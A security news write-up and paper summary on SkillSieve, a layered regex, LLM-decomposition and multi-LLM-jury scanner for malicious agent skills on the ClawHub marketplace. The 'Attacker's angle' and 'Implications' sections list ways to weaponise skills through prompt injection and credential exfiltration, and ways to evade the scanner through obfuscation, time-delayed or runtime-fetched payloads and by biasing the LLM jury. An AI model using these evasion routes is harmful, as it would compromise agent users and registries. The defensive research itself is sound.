SkillSieve triages malicious agent skills with LLM jury
Agents
Agent marketplaces are a supply-chain headache waiting to happen. OpenClaw’s ClawHub hosts over 13,000 community skills, and recent audits say 13% to 26% carry vulnerabilities. The nasty bit is where these hide: not just in code, but in the SKILL.md instructions that steer the agent. Static analysers stare at code. Regex catches only what it can see. Prompt injection, social engineering, and obfuscated payloads slip right through.
How SkillSieve works
SkillSieve is a layered triage pipeline that saves money and time by going deep only when needed. Layer 1 is a fast static pass: regex rules, abstract syntax tree features for Python, Bash and JavaScript, and metadata pulled from SKILL.md. A heuristic or optional XGBoost scorer decides whether to stop or escalate. This on-device pass filters roughly 86% of benign skills in about 39 ms with zero API cost. They processed 49,592 ClawHub skills on a USD 440 ARM single-board computer; Layer 1 alone ran in 31 minutes at 38.8 ms per skill.
Layer 2 is Structured Semantic Decomposition. Instead of asking one vague question to a Large Language Model (LLM), SkillSieve splits the job into four parallel checks: intent alignment, permission justification, covert behaviour detection, and cross-file consistency. Each returns structured JSON with a risk score, then the system fuses them. That decomposition matters. A single broad prompt missed many disguised attacks that the focused sub-tasks caught.
Layer 3 is a Multi-LLM Jury. Three different LLMs vote independently. If they disagree, they share structured reasoning and re-vote. On a 20-case borderline set, that debate triggered in 39% of sessions and produced unanimous or majority verdicts in most cases, leaving only truly murky skills for humans.
Attacker’s angle
The paper lists the usual goals: lift credentials, exfiltrate data, pop remote shells, and manipulate users via prompt injection and social engineering. Evasion is where it gets fun. They generated adversarial samples using encoding obfuscation, cross-file logic splitting, conditional triggers, homoglyph substitution and time-delayed payloads. SkillSieve intercepted all 100 such samples in their tests, with different layers tripping on different tricks. Still, there are gaps worth probing. The system scans package contents statically, so payloads fetched at runtime can stay invisible. Time-delayed logic remains hard because it looks inert when scanned. And because Layers 2 and 3 lean on LLMs, model variance and bias are attack surfaces; a convincing benign story might tip a lenient model. Pure name impersonation also sits outside its content scope.
Results are solid: on a 400-skill benchmark, SkillSieve scored F1 0.800 (precision 0.752, recall 0.854), beating the regex baseline ClawVet at 0.421, with average API spend about USD 0.006 per skill. Code, data and the benchmark are open-sourced. The next interesting questions are dynamic: how to catch runtime fetches, handle time bombs robustly, and pick jury models that resist targeted bias.
Additional analysis of the original ArXiv paper
📋 Original Paper Title and Abstract
SkillSieve: A Hierarchical Triage Framework for Detecting Malicious AI Agent Skills
🔍 ShortSpan Analysis of the Paper
Problem
The paper investigates detection of malicious or misused AI agent skills in public marketplaces. Skills combine natural language instructions and optional executable scripts, which enables attacks such as credential theft, data exfiltration, remote code execution and social engineering. Existing scanners either match patterns in code or analyse executable content but fail to read free‑text SKILL.md instructions where prompt injection and social engineering hide; single‑model LLM analysis is brittle. This leaves agent registries vulnerable to supply‑chain and prompt‑injection threats and creates a need for a cost‑effective, explainable scanning pipeline that handles both code and prose.
Approach
SkillSieve is a three‑layer hierarchical triage framework that applies progressively deeper checks only for suspicious skills. Layer 1 is a fast static triage combining regex rules, AST features from parsed Python/Bash/JavaScript, and metadata from SKILL.md to produce a risk score via a heuristic (and optionally an XGBoost model). It runs on‑device with no API cost and filters roughly 86% of skills in about 39 ms on average. Layer 2 is Structured Semantic Decomposition: suspicious skills are analysed by an LLM using four parallel sub‑tasks focused on intent alignment, permission justification, covert behaviour detection and cross‑file consistency; each sub‑task returns structured JSON and a risk score that are combined into an overall Layer 2 score. Layer 3 is a Multi‑LLM Jury Protocol: three independent LLMs vote; if they disagree they exchange structured reasoning and re‑vote, producing an explainable verdict or flagging the skill for human review.
Key Findings
- Detection performance on a 400‑skill labelled benchmark: SkillSieve (Layer 1 + SSD) achieves F1 = 0.800 (precision 0.752, recall 0.854), outperforming a regex baseline ClawVet (F1 = 0.421).
- Cost and efficiency: average API cost per skill is about USD 0.006 because 86% of skills are resolved at Layer 1 for free; the full 49,592‑skill ClawHub archive was processed on a USD 440 ARM single‑board computer, with Layer 1 scanning in 31 minutes at 38.8 ms per skill.
- Adversarial robustness: across five evasion techniques (encoding obfuscation, cross‑file logic splitting, conditional triggers, homoglyph substitution, time‑delayed payloads) SkillSieve intercepted all 100 generated adversarial samples in the evaluation; different techniques produce distinct per‑layer interception patterns.
- Decomposition improves recall: a single broad LLM prompt missed many disguised attacks that SSD caught by examining security dimensions independently.
- Layer 3 jury and debate reduced ambiguous cases: in a 20‑case borderline set the debate phase activated in 39% of jury sessions and produced unanimous or majority verdicts in most cases, deferring only genuinely ambiguous skills to humans.
Limitations
SkillSieve operates on static package contents and cannot detect payloads fetched at runtime. Time‑delayed attacks remain especially challenging because malicious logic can appear inert at scan time. Layers 2 and 3 depend on non‑deterministic LLM outputs and inherit model biases; while debate reduces some uncertainty, variance and vendor differences persist. Pure name impersonation without malicious content is outside the content‑focused scope and requires registry‑wide name analysis.
Implications
Offensive security implications include clear goals an attacker can pursue by weaponising skills: exfiltrating credentials, establishing remote shells, or manipulating agents via prompt injection and social engineering. The paper shows attackers can combine evasion techniques such as cross‑file splitting, encoding obfuscation, conditional triggers, homoglyphs and time delays to reduce static signals. Because Layers 2 and 3 rely on LLMs, attackers might also exploit model biases or non‑determinism to produce plausible benign explanations or to target models that lean toward false negatives. Runtime fetching of payloads or purely registry‑level impersonation remain practical avenues for evasion under the current static and semantic scanning setup.